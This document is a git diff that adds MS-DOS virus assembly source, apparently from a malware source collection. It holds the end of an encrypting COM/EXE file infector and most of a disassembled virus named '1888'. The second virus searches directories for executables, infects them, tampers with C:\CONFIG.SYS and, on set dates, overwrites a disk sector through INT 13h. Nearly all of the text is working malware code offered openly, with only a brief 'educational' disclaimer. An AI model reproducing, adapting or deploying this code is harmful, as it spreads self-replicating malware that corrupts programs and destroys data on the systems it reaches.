+ mov word ptr [bp+buffer+16h], ax
+
+ mov word ptr [bp+buffer+0Eh], ax ; and stack
+ mov word ptr [bp+buffer+10h], id
+
+ pop dx ; get file length
+ pop ax
+
+ add ax,(heap-decrypt) ; add virus size
+ adc dx, 0
+
+ mov cl, 9
+ push ax
+ shr ax, cl
+ ror dx, cl
+ stc
+ adc dx, ax
+ pop ax
+ and ah, 1 ; mod 512
+
+ mov word ptr [bp+buffer+4], dx ; new file size
+ mov word ptr [bp+buffer+2], ax
+
+ push cs ; restore ES
+ pop es
+
+ push word ptr [bp+buffer+14h] ; needed later
+ mov cx, 1ah
+ jmp short finishinfection
+infect_com: ; ax = filesize
+ mov cx,3
+ sub ax,cx
+ lea si,[bp+offset buffer]
+ lea di,[bp+offset save3]
+ movsw
+ movsb
+ mov byte ptr [si-3],0e9h
+ mov word ptr [si-2],ax
+ add ax,103h
+ push ax ; needed later
+finishinfection:
+ push cx ; Save # bytes to write
+ xor cx,cx ; Clear attributes
+ call attributes ; Set file attributes
+
+ mov al,2
+ call open
+
+ mov ah,40h ; Write to file
+ lea dx,[bp+buffer] ; Write from buffer
+ pop cx ; cx bytes
+ int 21h
+
+ mov ax,4202h ; Move file pointer
+ xor cx,cx ; to end of file
+ cwd ; xor dx,dx
+ int 21h
+
+get_encrypt_value:
+ mov ah,2ch ; Get current time
+ int 21h ; dh=sec,dl=1/100 sec
+ or dx,dx ; Check if encryption value = 0
+ jz get_encrypt_value ; 
Get another if it is
+ mov [bp+decrypt_value],dx ; Set new encryption value
+ lea di,[bp+code_store]
+ mov ax,5355h ; push bp,push bx
+ stosw
+ lea si,[bp+decrypt] ; Copy encryption function
+ mov cx,startencrypt-decrypt ; Bytes to move
+ push si ; Save for later use
+ push cx
+ rep movsb
+
+ lea si,[bp+write] ; Copy writing function
+ mov cx,endwrite-write ; Bytes to move
+ rep movsb
+ pop cx
+ pop si
+ pop dx ; Entry point of virus
+ push di
+ push si
+ push cx
+ rep movsb ; Copy decryption function
+ mov ax,5b5dh ; pop bx,pop bp
+ stosw
+ mov al,0c3h ; retn
+ stosb
+
+ add dx,offset startencrypt - offset decrypt ; Calculate new
+ mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of
+ call code_store ; decryption
+ pop cx
+ pop di
+ pop si
+ rep movsb ; Restore decryption function
+
+ mov ax,5701h ; Restore creation date/time
+ mov cx,word ptr [bp+newDTA+16h] ; time
+ mov dx,word ptr [bp+newDTA+18h] ; date
+ int 21h
+
+ mov ah,3eh ; Close file
+ int 21h
+
+ mov ch,0
+ mov cl,byte ptr [bp+newDTA+15h] ; Restore original
+ call attributes ; attributes
+
+ dec byte ptr [bp+numinfec] ; One mo infection
+ jnz mo_infections ; Not enough
+ pop ax ; remove call from stack
+ jmp done_infections
+mo_infections: jmp find_next
+
+open:
+ mov ah,3dh
+ lea dx,[bp+newDTA+30] ; filename in DTA
+ int 21h
+ xchg ax,bx
+ ret
+
+attributes:
+ mov ax,4301h ; Set attributes to cx
+ lea dx,[bp+newDTA+30] ; filename in DTA
+ int 21h
+ ret
+
+write:
+ pop bx ; Restore file handle
+ pop bp ; Restore relativeness
+ mov ah,40h ; Write to file
+ lea dx,[bp+decrypt] ; Concatenate virus
+ mov cx,(heap-decrypt) ; # bytes to write
+ int 21h
+ push bx
+ push bp
+endwrite:
+
+int24: ; New int 24h (error) handler
+ mov al,3 ; Fail call
+ iret ; Return control
+data00 dw 2000,8,2500,8,2000,14,2500,14
+ dw 2500,14,3000,4,4000,24,3500,12,4000,6
+ dw 3500,12,4000,4,4500,10,5000,4
+ dw 5500,15,3000,8,3500,20,3000,8,3500,50
+ dw 2000,8,2500,8,2000,14,2500,14
+ dw 
2500,14,3000,4,4000,24,3500,12,4000,6
+ dw 3500,12,4000,4,4500,10,5000,4
+ dw 5500,15,3000,8,3500,20,3000,8,3500,50
+ dw 2000,8,2500,8,2000,14,2500,14
+ dw 2500,14,3000,4,4000,24,3500,12,4000,6
+ dw 3500,12,4000,4,4500,10,5000,4
+ dw 5500,15,3000,8,3500,20,3000,8,3500,50
+ dw 0
+
+data_6 db 9
+ db 10h, 19h, 45h, 18h, 19h, 1Bh
+ db 01h,0D5h,0CDh,0CDh,0B8h, 04h
+ db 0F3h, 09h,0A9h, 04h, 9Dh
+ db 9
+ db 0AAh, 04h,0F2h, 01h,0D5h,0CDh
+ db 0CDh,0B8h, 19h, 1Ch, 18h, 19h
+ db 12h,0D5h, 1Ah, 0Ah,0CDh,0BEh
+ db 20h, 09h, 5Ch, 04h,0F6h, 09h
+ db 2Fh, 20h, 01h,0D4h, 1Ah, 0Ah
+ db 0CDh,0B8h, 19h, 13h, 18h, 19h
+ db 03h,0C9h, 1Ah, 0Dh,0CDh,0BEh
+ db 19h, 03h, 0Fh,0D2h,0B7h, 19h
+ db 04h,0D6h, 1Ah, 03h,0C4h,0B7h
+ db 20h,0D2h,0D2h,0C4h,0C4h,0C4h
+ db 0B7h, 19h, 04h, 01h,0D4h, 1Ah
+ db 0Eh,0CDh,0BBh, 19h, 03h, 18h
+ db 19h, 03h,0BAh, 19h, 12h, 07h
+ db 0BAh,0BAh, 19h, 04h,0BAh, 19h
+ db 03h,0BDh, 20h,0BAh,0BAh, 19h
+ db 02h,0D3h,0B7h, 19h, 13h, 01h
+ db 0BAh, 19h, 03h, 18h, 19h, 03h
+ db 0BAh, 19h, 07h, 0Bh, 1Ah, 02h
+ db 04h, 19h, 07h, 08h,0BAh,0B6h
+ db 19h, 04h,0C7h,0C4h,0B6h, 19h
+ db 03h,0BAh,0B6h, 19h, 03h,0BAh
+ db 19h, 07h, 0Bh, 1Ah, 02h, 04h
+ db 19h, 08h, 01h,0BAh, 19h, 03h
+ db 18h,0D6h,0C4h,0C4h, 20h,0BAh
+ db 19h, 12h, 08h,0BAh,0D3h, 19h
+ db 02h,0B7h, 20h,0BAh, 19h, 03h
+ db 0B7h, 20h,0BAh,0D3h, 19h, 02h
+ db 0D6h,0BDh, 19h, 13h, 01h,0BAh
+ db 20h,0C4h,0C4h,0B7h, 18h,0D3h
+ db 0C4h,0C4h,0C4h,0BDh, 19h, 12h
+ db 08h,0D3h, 1Ah, 03h,0C4h,0BDh
+ db 20h,0D3h, 1Ah, 03h,0C4h,0BDh
+ db 20h,0D0h, 1Ah, 03h,0C4h,0BDh
+ db 19h, 14h, 01h,0D3h,0C4h,0C4h
+ db 0C4h,0BDh, 18h, 04h, 1Ah, 04h
+ db 3Eh, 19h, 03h, 0Fh,0D6h, 1Ah
+ db 04h,0C4h,0B7h, 20h,0D6h, 1Ah
+ db 03h,0C4h,0B7h, 20h,0D2h,0D2h
+ db 0C4h,0C4h,0C4h,0B7h, 20h,0D2h
+ db 0D2h,0C4h,0C4h,0C4h,0B7h, 20h
+ db 0D6h, 1Ah, 03h,0C4h,0B7h, 20h
+ db 0D2h,0B7h, 19h, 04h,0D2h, 20h
+ db 20h,0D2h,0D2h,0C4h,0C4h,0C4h
+ db 0B7h, 19h, 03h, 04h, 1Ah, 04h
+ db 3Ch, 18h, 01h,0D6h,0C4h,0C4h
+ db 0C4h,0B7h, 19h, 07h, 07h,0D6h
+ db 0C4h,0BDh
+ dd 
319BA20h ; Data table (indexed access)
+ db 0BDh, 20h,0BAh,0BDh, 19h, 02h
+ db 0BAh, 20h,0BAh,0BDh, 19h, 02h
+ db 0BAh, 20h,0BAh, 19h, 03h,0BDh
+ db 20h,0BAh,0BAh, 19h, 04h,0BAh
+ db 20h, 20h,0BAh,0BAh, 19h, 02h
+ db 0BAh, 19h, 03h, 01h,0D6h,0C4h
+ db 0C4h,0C4h,0B7h, 18h,0D3h,0C4h
+ db 0C4h, 20h,0BAh, 19h, 06h, 08h
+ db 58h, 19h, 03h,0C7h,0C4h,0B6h
+ db 19h, 03h,0BAh, 1Ah, 03h,0C4h
+ db 0BDh, 20h,0BAh, 1Ah, 03h,0C4h
+ db 0BDh, 20h,0C7h,0C4h,0B6h, 19h
+ db 03h,0BAh,0B6h, 19h, 04h,0BAh
+ db 20h, 20h,0BAh,0B6h, 19h, 02h
+ db 0BAh, 19h, 03h, 01h,0BAh, 20h
+ db 0C4h,0C4h,0BDh, 18h, 19h, 03h
+ db 0BAh, 19h, 03h, 08h,0D6h,0C4h
+ db 0BDh, 19h, 04h,0BAh, 19h, 03h
+ db 0B7h, 20h,0BAh, 19h, 05h,0BAh
+ db 19h, 05h,0BAh, 19h, 03h,0B7h
+ db 20h,0BAh,0D3h, 19h, 02h,0B7h
+ db 20h,0BAh, 20h, 20h,0BAh,0D3h
+ db 19h, 02h,0BAh, 19h, 03h, 01h
+ db 0BAh, 19h, 03h, 18h, 19h, 03h
+ db 0BAh, 19h, 03h, 08h,0D3h, 1Ah
+ db 04h,0C4h,0BDh, 20h,0D3h, 1Ah
+ db 03h,0C4h,0BDh, 20h,0BDh, 19h
+ db 05h,0BDh, 19h, 05h,0D3h, 1Ah
+ db 03h,0C4h,0BDh, 20h,0D3h, 1Ah
+ db 03h,0C4h,0BDh, 20h,0D0h, 20h
+ db 20h,0D0h, 19h, 03h,0D0h, 19h
+ db 03h, 01h,0BAh, 19h, 03h, 18h
+ db 19h, 03h,0C8h, 1Ah, 15h,0CDh
+ db 0B8h, 19h, 0Ch,0D5h, 1Ah, 16h
+ db 0CDh,0BCh, 19h, 03h, 18h, 19h
+ db 1Ah,0D4h,0CDh, 04h, 1Ah, 03h
+ db 0F7h, 09h, 2Fh, 04h,0EAh, 09h
+ db 5Ch, 04h, 1Ah, 03h,0F7h, 01h
+ db 0CDh,0BEh, 19h, 1Bh, 18h
+
+data_1e equ 0A0h
+dot_dot db '..',0
+heap:
+; The following code is the buffer for the write function
+code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)
+oldint24 dd ? ; Storage for old int 24h handler
+backslash db ?
+origdir db 64 dup (?) ; Current directory buffer
+newDTA db 43 dup (?) ; Temporary DTA
+numinfec db ? ; Infections this run
+buffer db 1ah dup (?) ; read buffer
+endheap: ; End of virus
+finish label near
+end entry_point
+
+
+
+; Yeah, the main problem is reproducing the effect in an infected file so
+; thta when IT runs, IT too will display... That's the GLITCH...
+;
+; Also, I had stuck INT 27H in somewhere around the EXIT .EXE...
+; I don't remember, but it would go resident and suck up memory, yet
+; since it hooked no interuppts, it just sat there...
+; Feel free to STUDY this code and distribute it feely for educational
+; purposes, because in spite of the kidding...I don't "hAcK"... for lack
+; of a better word...--->>pAgE<<---
diff --git a/MSDOS/Virus.MSDOS.Unknown.1888.asm b/MSDOS/Virus.MSDOS.Unknown.1888.asm
new file mode 100644
index 00000000..ccc01a31
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.1888.asm
@@ -0,0 +1,1923 @@
+
+PAGE 59,132
+
+;
+;
+; 1888
+;
+; Created: 28-Jul-92
+; Passes: 5 Analysis Options on: none
+;
+;
+
+d_0040_001C_e equ 1Ch
+d_0040_004A_e equ 4Ah
+d_8B38_0003_e equ 3 ;*
+data_0012_e equ 12h
+data_0016_e equ 16h
+data_00A3_e equ 0A3h
+data_00A7_e equ 0A7h
+data_00A9_e equ 0A9h
+data_00AB_e equ 0ABh
+data_00AF_e equ 0AFh
+data_00B3_e equ 0B3h
+data_00B5_e equ 0B5h
+d_9E01_0000_e equ 0 ;*
+d_9E01_0002_e equ 2 ;*
+d_9E01_0004_e equ 4 ;*
+d_9E01_0008_e equ 8 ;*
+d_9E01_0014_e equ 14h ;*
+d_9E01_0016_e equ 16h ;*
+
+seg_a segment byte public
+ assume cs:seg_a, ds:seg_a
+
+
+ org 100h
+
+1888 proc far
+
+start:
+ jmp loc_0767
+data_0103 db 20h
+data_0104 dw 86C0h
+data_0106 dw 18FCh
+data_0108 dw 762h
+data_010A dw 0
+data_010C db '1888.COM', 0
+ db 00h, 00h, 00h,0A6h
+data_0119 dw 25h
+data_011B db 1
+data_011C dw 760h
+data_011E db 0
+data_011F db 0
+data_0120 dw 762h
+data_0122 dw 760h
+data_0124 dw 0FFFEh
+data_0126 dw 5369h ; Data table (indexed access)
+data_0128 dw 5369h
+data_012A dw 4C97h
+data_012C dd 9E010000h
+data_0130 dw 7C8h
+data_0132 db 8
+data_0133 db 10h
+data_0134 db 0
+data_0135 db 10h
+ db 0, 0, 0, 0
+data_013A db '\DANGER\1888'
+ db 20 dup (0)
+data_015A db 'C:\', 0
+ db '*', 0
+ db 'NETWARE', 0
+ db 'LMS', 0
+ db 'MAUS', 0
+ db 'MDB', 0
+ db 'DOS', 0
+ db 'BASE', 0
+ db 'L', 0
+data_0180 dw 160h
+data_0182 db 0
+data_0183 db 1
+ db 14h, 17h, 6Eh, 00h, 01h,0A9h
+ db 00h, 01h,0BFh
+ db 38h
+data_018E db 2Ah
+ db 2Eh, 65h, 78h, 65h, 00h
+data_0194 db 2Ah
+ db 2Eh, 63h, 6Fh, 6Dh, 00h
+data_019A db 0
+data_019B db 0
+data_019C db 0
+data_019D db 4
+ db 3Fh
+ db 7 dup (3Fh)
+ db 43h, 4Fh, 4Dh, 23h, 04h, 00h
+ db 0F3h, 31h, 0Dh, 4Dh, 18h, 68h
+ db 20h,0C0h, 86h,0FCh, 18h, 62h
+ db 07h, 00h, 00h
+ db '1888.COM'
+ db 00h, 00h, 00h, 00h,0A6h,0EAh
+ db 0AAh, 03h, 00h,0CCh,0AAh, 03h
+ db 60h, 07h, 00h, 40h, 05h, 00h
+ db 60h, 07h, 00h, 01h,0C8h, 01h
+ db 19h, 01h, 00h, 00h, 69h, 53h
+ db 69h, 53h, 61h, 06h, 9Dh, 04h
+ db 16h, 32h, 21h, 
00h, 7Bh, 1Ah
+ db 12h, 32h,0ADh, 04h, 69h, 53h
+ db 12h, 32h,0DEh, 07h
+
+1888 endp
+
+;
+; SUBROUTINE
+;
+
+sub_01F7 proc near
+ cmp data_011C,0
+ jne loc_0207 ; Jump if not equal
+ mov ax,760h
+ mov data_011C,ax
+ mov data_0120,ax
+loc_0207:
+ mov al,data_011E
+ mov data_011F,al
+ mov ax,data_0120
+ mov data_0122,ax
+ inc data_0119
+ mov data_019C,0
+ mov data_019A,0
+ mov data_019B,0
+ retn
+sub_01F7 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_0227 proc near
+ lea dx,data_0183 ; Load effective addr
+ xor al,al ; Zero register
+ mov ah,3Dh ; '='
+ int 21h ; DOS Services ah=function 3Dh
+ ; open file, al=mode,name@ds:dx
+ jc loc_ret_0239 ; Jump if carry Set
+ mov bx,ax
+ mov ah,3Eh ; '>'
+ int 21h ; DOS Services ah=function 3Eh
+ ; close file, bx=file handle
+
+loc_ret_0239:
+ retn
+sub_0227 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_023A proc near
+ mov ah,2Ah ; '*'
+ int 21h ; DOS Services ah=function 2Ah
+ ; get date, cx=year, dh=month
+ ; dl=day, al=day-of-week 0=SUN
+ mov ah,dh
+ cmp cx,data_0130
+ je loc_0249 ; Jump if equal
+ add ah,0Ch
+loc_0249:
+ sub ah,data_0132
+ mov data_011B,ah
+ mov data_0134,al
+ mov data_0133,dl
+ mov data_0132,dh
+ mov data_0130,cx
+ mov ah,2Ch ; ','
+ int 21h ; DOS Services ah=function 2Ch
+ ; get time, cx=hrs/min, dx=sec
+ mov data_0135,ch
+ retn
+sub_023A endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_0269 proc near
+ mov ax,es
+ dec ax
+ push es
+ mov es,ax
+ mov ax,es:d_8B38_0003_e
+ mov data_012A,ax
+ pop es
+ mov bx,ax
+ sub bx,200h
+ mov ah,4Ah ; 'J'
+ int 21h ; DOS Services ah=function 4Ah
+ ; change memory allocation
+ ; bx=bytes/16, es=mem segment
+ mov bx,150h
+ mov ah,48h ; 'H'
+ int 21h ; DOS Services ah=function 48h
+ ; allocate memory, bx=bytes/16
+ mov word ptr data_012C+2,ax
+ retn
+sub_0269 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_028C proc near
+ push es
+ mov ax,word ptr data_012C+2
+ mov es,ax
+ mov ah,49h ; 'I'
+ int 21h ; DOS Services ah=function 49h
+ ; release memory block, es=seg
+ mov ax,data_0128
+ mov es,ax
+ mov bx,data_012A
+ 
mov ah,4Ah ; 'J'
+ int 21h ; DOS Services ah=function 4Ah
+ ; change memory allocation
+ ; bx=bytes/16, es=mem segment
+ pop es
+ retn
+sub_028C endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_02A5 proc near
+ push ds
+ mov ah,1Bh
+ int 21h ; DOS Services ah=function 1Bh
+ ; get disk info, default drive
+ ; al=sectors per cluster
+ ; ds:bx=ptr to media ID byte
+ ; cx=sector size, dx=clusters
+ cmp byte ptr [bx],0F8h
+ pop ds
+ retn
+sub_02A5 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_02AF proc near
+ lea si,data_019D ; Load effective addr
+ mov di,si
+ xor dl,dl ; Zero register
+ mov ah,47h ; 'G'
+ int 21h ; DOS Services ah=function 47h
+ ; get present dir,drive dl,1=a:
+ ; ds:si=ASCIIZ directory name
+ mov cx,30h
+ mov al,0
+ repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
+ mov cx,di
+ sub cx,si
+ lea di,data_013A ; ('\DANGER\1888') Load effective addr
+ mov al,5Ch ; '\'
+ stosb ; Store al to es:[di]
+ rep movsb ; Rep when cx >0 Mov [si] to es:[di]
+ retn
+sub_02AF endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_02D0 proc near
+ mov data_0182,0
+ lea bx,cs:[160h] ; Load effective addr
+ add bx,20h
+ mov data_0180,bx
+ sub bx,20h
+ lea dx,data_015A+4 ; ('*') Load effective addr
+ mov cx,33h
+ mov ah,4Eh ; 'N'
+ int 21h ; DOS Services ah=function 4Eh
+ ; find 1st filenam match @ds:dx
+ jc loc_031F ; Jump if carry Set
+loc_02F0:
+ lea di,data_019D ; Load effective addr
+ add di,1Eh
+ cmp byte ptr [di],2Eh ; '.'
+ je loc_0319 ; Jump if equal
+ mov si,di
+ mov cx,20h
+ mov al,0
+ repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
+ mov cx,di
+ sub cx,si
+ mov di,bx
+ add bx,cx
+ cmp bx,data_0180
+ ja loc_031F ; Jump if above
+ rep movsb ; Rep when cx >0 Mov [si] to es:[di]
+ inc data_0182
+loc_0319:
+ mov ah,4Fh ; 'O'
+ int 21h ; DOS Services ah=function 4Fh
+ ; find next filename match
+ jnc loc_02F0 ; Jump if carry=0
+loc_031F:
+ lea bx,cs:[160h] ; Load effective addr
+ mov data_0180,bx
+ retn
+sub_02D0 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_0328 proc near
+ cmp data_0182,0
+ je loc_ret_034C ; Jump if equal
+ lea dx,data_013A ; ('\DANGER\1888') Load effective addr
+ mov ah,3Bh ; ';'
+ int 21h ; DOS Services ah=function 3Bh
+ ; set current dir, path @ ds:dx
+ mov dx,data_0180
+ mov di,dx
+ mov ah,3Bh ; ';'
+ int 21h ; DOS Services ah=function 3Bh
+ ; set current dir, path @ ds:dx
+ mov al,0
+ mov cx,20h
+ repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
+ mov data_0180,di
+
+loc_ret_034C:
+ retn
+sub_0328 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_034D proc near
+ mov ax,data_0104
+ and al,1Fh
+ cmp al,1Eh
+ retn
+sub_034D endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_0355 proc near
+ lea dx,data_0194 ; Load effective addr
+ cmp data_011E,0
+ je loc_0364 ; Jump if equal
+ lea dx,data_018E ; Load effective addr
+loc_0364:
+ mov cx,23h
+ mov ah,4Eh ; 'N'
+ int 21h ; DOS Services ah=function 4Eh
+ ; find 1st filenam match @ds:dx
+ retn
+sub_0355 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_036C proc near
+ lea si,data_019D ; Load effective addr
+ add si,15h
+ lea di,data_0103 ; Load effective addr
+ mov cx,16h
+ rep movsb ; Rep when cx >0 Mov [si] to es:[di]
+ retn
+sub_036C endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_037D proc near
+ pushf ; Push flags
+ mov cx,data_0104
+ or cl,1Fh
+ and cl,0FEh
+ mov dx,data_0106
+ mov ax,5701h
+ int 21h ; DOS Services ah=function 57h
+ ; set file date+time, bx=handle
+ ; cx=time, dx=time
+ mov ah,3Eh ; '>'
+ int 21h ; DOS Services ah=function 3Eh
+ ; close file, bx=file handle
+ lea dx,data_010C ; ('1888.COM') Load effective addr
+ xor ch,ch ; Zero register
+ mov cl,data_0103
+ mov ax,4301h
+ int 21h ; DOS Services ah=function 43h
+ ; set attrb cx, filename @ds:dx
+ popf ; Pop flags
+ retn
+sub_037D endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_03A6 proc near
+ lea dx,data_010C ; ('1888.COM') Load effective addr
+ xor cx,cx ; Zero register
+ mov ax,4301h
+ int 21h ; DOS Services ah=function 43h
+ ; set attrb cx, filename @ds:dx
+ jc loc_ret_03BA ; Jump if carry Set
+ mov ax,3D02h
+ int 21h ; DOS Services ah=function 3Dh
+ ; open file, al=mode,name@ds:dx
+ mov bx,ax
+
+loc_ret_03BA:
+ retn
+sub_03A6 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_03BB proc near
+ push ds
+ mov ax,word ptr data_012C+2
+ mov ds,ax
+ mov cx,100h
+ xor dx,dx ; Zero register
+ mov ah,3Fh ; '?'
+ int 21h ; DOS Services ah=function 3Fh
+ ; read file, bx=file handle
+ ; cx=bytes to ds:dx buffer
+ cmp word ptr ds:d_9E01_0000_e,5A4Dh
+ nop ;*ASM fixup - sign extn byte
+ je loc_03D6 ; Jump if equal
+ stc ; Set carry flag
+ jmp loc_0455
+loc_03D6:
+ call sub_0457
+ push ax
+ mov ax,di
+ and ax,0Fh
+ mov cx,10h
+ xor dx,dx ; Zero register
+ sub cx,ax
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file bx=file handle
+ ; cx=bytes from ds:dx buffer
+ jnc loc_03EF ; Jump if carry=0
+ jmp short loc_0455
+ db 90h
+loc_03EF:
+ mov si,ax
+ mov cx,100h
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file bx=file handle
+ ; cx=bytes from ds:dx buffer
+ jc loc_0455 ; Jump if carry Set
+ pop dx
+ mov ax,di
+ add ax,si
+ add ax,100h
+ cmp ax,200h
+ jb loc_040B ; Jump if below
+ and ax,1FFh
+ inc dx
+loc_040B:
+ mov cl,4
+ shr ax,cl ; Shift w/zeros fill
+ dec dx
+ mov cl,5
+ shl dx,cl ; Shift w/zeros fill
+ sub dx,ds:d_9E01_0008_e
+ add ax,dx
+ sub ax,10h
+ mov ds:d_9E01_0016_e,ax
+ mov word ptr ds:d_9E01_0014_e,100h
+ push ds
+ mov ax,cs
+ mov ds,ax
+ mov cx,data_011C
+ mov dx,100h
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file 
bx=file handle
+ ; cx=bytes from ds:dx buffer
+ pop ds
+ jc loc_0455 ; Jump if carry Set
+ call sub_0457
+ mov ds:d_9E01_0002_e,di
+ mov ds:d_9E01_0004_e,ax
+ mov ax,4200h
+ xor dx,dx ; Zero register
+ xor cx,cx ; Zero register
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, bx=file handle
+ ; al=method, cx,dx=offset
+ jc loc_0455 ; Jump if carry Set
+ mov cx,100h
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file bx=file handle
+ ; cx=bytes from ds:dx buffer
+loc_0455:
+ pop ds
+ retn
+sub_03BB endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_0457 proc near
+ mov ax,4202h
+ xor cx,cx ; Zero register
+ xor dx,dx ; Zero register
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, bx=file handle
+ ; al=method, cx,dx=offset
+ mov di,ax
+ and di,1FFh
+ mov cl,9
+ shr ax,cl ; Shift w/zeros fill
+ mov cl,7
+ shl dx,cl ; Shift w/zeros fill
+ add ax,dx
+ inc ax
+ retn
+sub_0457 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_0472 proc near
+ mov ax,data_0108
+ mov data_0120,ax
+ mov cx,data_011C
+ cmp cx,ax
+ jb loc_0488 ; Jump if below
+ mov data_0120,cx
+ mov cx,data_0108
+loc_0488:
+ push ds
+ mov ax,word ptr data_012C+2
+ mov ds,ax
+ xor dx,dx ; Zero register
+ mov ah,3Fh ; '?'
+ int 21h ; DOS Services ah=function 3Fh
+ ; read file, bx=file handle
+ ; cx=bytes to ds:dx buffer
+ pop ds
+ jc loc_ret_04DD ; Jump if carry Set
+ mov ax,4200h
+ xor dx,dx ; Zero register
+ xor cx,cx ; Zero register
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, bx=file handle
+ ; al=method, cx,dx=offset
+ jc loc_ret_04DD ; Jump if carry Set
+ mov dx,100h
+ mov cx,data_011C
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file bx=file handle
+ ; cx=bytes from ds:dx buffer
+ int 3 ; Debug breakpoint
+ cmp ax,cs:data_0108
+ ja loc_04CC ; Jump if above
+ mov ax,4200h
+ mov dx,data_0108
+ mov data_0120,dx
+ xor cx,cx ; Zero register
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, bx=file handle
+ ; al=method, cx,dx=offset
+ jc loc_ret_04DD ; Jump if carry Set
+ mov cx,data_011C
+ jmp short loc_04D0
+loc_04CC:
+ mov cx,data_0108
+loc_04D0:
+ push ds
+ mov ax,word ptr data_012C+2
+ mov ds,ax
+ xor dx,dx ; Zero register
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file bx=file handle
+ ; cx=bytes from ds:dx buffer
+ pop ds
+
+loc_ret_04DD:
+ retn
+sub_0472 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_04DE proc near
+ cmp data_011B,2
+ ja loc_04E8 ; Jump if above
+ xor ax,ax ; Zero register
+ retn
+loc_04E8:
+ mov al,data_0133
+ and al,1
+ retn
+sub_04DE endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_04EE proc near
+ cmp data_0133,0Fh
+ jb loc_0507 ; Jump if below
+ mov al,data_0135
+ cmp al,13h
+ jb loc_0507 ; Jump if below
+ mov ax,40h
+ mov es,ax
+ mov byte ptr es:d_0040_004A_e,23h ; '#'
+loc_0507:
+ cmp data_0133,0Dh
+ jne loc_ret_0524 ; Jump if not equal
+ cmp data_0134,5
+ jne loc_ret_0524 ; Jump if not equal
+ mov ax,301h
+ mov cx,1
+ mov dx,50h
+ xor bx,bx ; Zero register
+ mov es,bx
+ int 13h ; Disk dl=drive ? 
ah=func 03h
+ ; write sectors from mem es:bx
+ ; al=#,ch=cyl,cl=sectr,dh=head
+
+loc_ret_0524:
+ retn
+sub_04EE endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_0525 proc near
+ mov data_019B,1
+ lea dx,data_05C1 ; Load effective addr
+ mov cx,27h
+ mov ah,4Eh ; 'N'
+ int 21h ; DOS Services ah=function 4Eh
+ ; find 1st filenam match @ds:dx
+ jnc loc_0564 ; Jump if carry=0
+ mov ah,3Ch ; '<'
+ mov cx,6
+ int 21h ; DOS Services ah=function 3Ch
+ ; create/truncate file @ ds:dx
+ mov bx,ax
+ lea dx,data_05EE ; Load effective addr
+ mov cx,data_070A
+ mov si,dx
+ add si,data_00B3_e
+ mov ax,data_0130
+ mov [si],ax
+ mov ah,data_0132
+ mov [si+2],ah
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file bx=file handle
+ ; cx=bytes from ds:dx buffer
+ mov ah,3Eh ; '>'
+ int 21h ; DOS Services ah=function 3Eh
+ ; close file, bx=file handle
+ jc loc_05BD ; Jump if carry Set
+loc_0564:
+ lea dx,data_05C7 ; Load effective addr
+ mov cx,27h
+ mov ah,4Eh ; 'N'
+ int 21h ; DOS Services ah=function 4Eh
+ ; find 1st filenam match @ds:dx
+ jc loc_05BD ; Jump if carry Set
+ call sub_036C
+ xor cx,cx ; Zero register
+ mov ax,4301h
+ int 21h ; DOS Services ah=function 43h
+ ; set attrb cx, filename @ds:dx
+ mov ax,3D02h
+ int 21h ; DOS Services ah=function 3Dh
+ ; open file, al=mode,name@ds:dx
+ mov bx,ax
+ jc loc_05BD ; Jump if carry Set
+ mov cx,data_0108
+ push es
+ push ds
+ mov ax,word ptr data_012C+2
+ mov ds,ax
+ mov es,ax
+ xor dx,dx ; Zero register
+ mov ah,3Fh ; '?'
+ int 21h ; DOS Services ah=function 3Fh
+ ; read file, bx=file handle
+ ; cx=bytes to ds:dx buffer
+ pop ds
+ mov dx,ax
+ mov ax,0FFFFh
+ xor di,di ; Zero register
+ repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
+ cmp ax,es:[di-1]
+ pop es
+ jz loc_05BD ; Jump if zero
+ mov ax,4200h
+ xor cx,cx ; Zero register
+ dec dx
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, bx=file handle
+ ; al=method, cx,dx=offset
+ jc loc_05BD ; Jump if carry Set
+ lea dx,data_05D5 ; Load effective addr
+ mov cx,19h
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file bx=file handle
+ ; cx=bytes from ds:dx buffer
+loc_05BD:
+ call sub_037D
+ retn
+sub_0525 endp
+
+data_05C1 db 43h
+ db 3Ah, 5Ch,0FFh,0FFh, 00h
+data_05C7 db 'C:\CONFIG.SYS', 0
+data_05D5 db 'DEVICE ='
+ db 0FFh,0FFh
+ db ' COUNTRY.SYS', 0Dh, 0Ah
